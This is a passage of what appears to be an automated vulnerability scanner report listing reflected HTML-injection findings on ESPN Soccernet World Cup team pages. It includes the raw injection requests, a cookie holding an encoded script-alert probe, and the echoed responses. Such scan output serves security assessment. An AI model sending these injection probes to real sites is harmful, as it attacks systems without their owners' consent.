<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Spain Football / So ...[SNIP]... <a href="/worldcup2010/team?team=164&_slug_=spain53655"><a>809ac03abe5&topId=808124&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
5.62. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/164/spain
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99b73"><a>65c93cd4adf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/164/spain?99b73"><a>65c93cd4adf=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:16 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:16 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 23:33:16 GMT Content-Length: 80823 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Spain Football / So ...[SNIP]... <a href="/worldcup2010/team?team=164&99b73"><a>65c93cd4adf=1&_slug_=spain&99b73"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70388"><a>c589cccb3a6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/202/argentina70388"><a>c589cccb3a6 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:50 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:50 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN34 Cache-Expires: Sat, 06 Nov 2010 23:12:50 GMT Content-Length: 81978 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Argentina Football ...[SNIP]... <a href="/worldcup2010/team?team=202&_slug_=argentina70388"><a>c589cccb3a6&topId=805659&linktext=Heinze+wants+Maradona+to+continue"> ...[SNIP]...
5.64. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/202/argentina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf5da"><a>9b858241cd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/202/argentina?cf5da"><a>9b858241cd5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:01 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Cache-Expires: Sat, 06 Nov 2010 23:12:01 GMT Content-Length: 82086 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Argentina Football ...[SNIP]... <a href="/worldcup2010/team?team=202&cf5da"><a>9b858241cd5=1&_slug_=argentina&cf5da"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6da7b"><a>7d96bab73b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/205/brazil6da7b"><a>7d96bab73b8 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:02 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:02 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:14:01 GMT Content-Length: 81397 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Brazil Football / S ...[SNIP]... <a href="/worldcup2010/team?team=205&_slug_=brazil6da7b"><a>7d96bab73b8&topId=806003&linktext=Ex-Milan+coach+available"> ...[SNIP]...
5.66. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/205/brazil
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d87"><a>b513fd88d09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/205/brazil?36d87"><a>b513fd88d09=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:12:42 GMT Content-Length: 81505 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Brazil Football / S ...[SNIP]... <a href="/worldcup2010/team?team=205&36d87"><a>b513fd88d09=1&_slug_=brazil&36d87"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 977b9"><a>d4b442ea0d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/207/chile977b9"><a>d4b442ea0d6 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:57 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:57 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN14 Cache-Expires: Sat, 06 Nov 2010 23:13:57 GMT Content-Length: 81910 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Chile Football / So ...[SNIP]... <a href="/worldcup2010/team?team=207&_slug_=chile977b9"><a>d4b442ea0d6&topId=803725&linktext=Brilliant+Brazil+put+three+past+Chile"> ...[SNIP]...
5.68. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/207/chile
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe29"><a>f1fd16cfb8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/207/chile?ebe29"><a>f1fd16cfb8e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:29 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:29 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Cache-Expires: Sat, 06 Nov 2010 23:12:29 GMT Content-Length: 82018 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Chile Football / So ...[SNIP]... <a href="/worldcup2010/team?team=207&ebe29"><a>f1fd16cfb8e=1&_slug_=chile&ebe29"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d453d"><a>904bfdecc42 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/210/paraguayd453d"><a>904bfdecc42 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
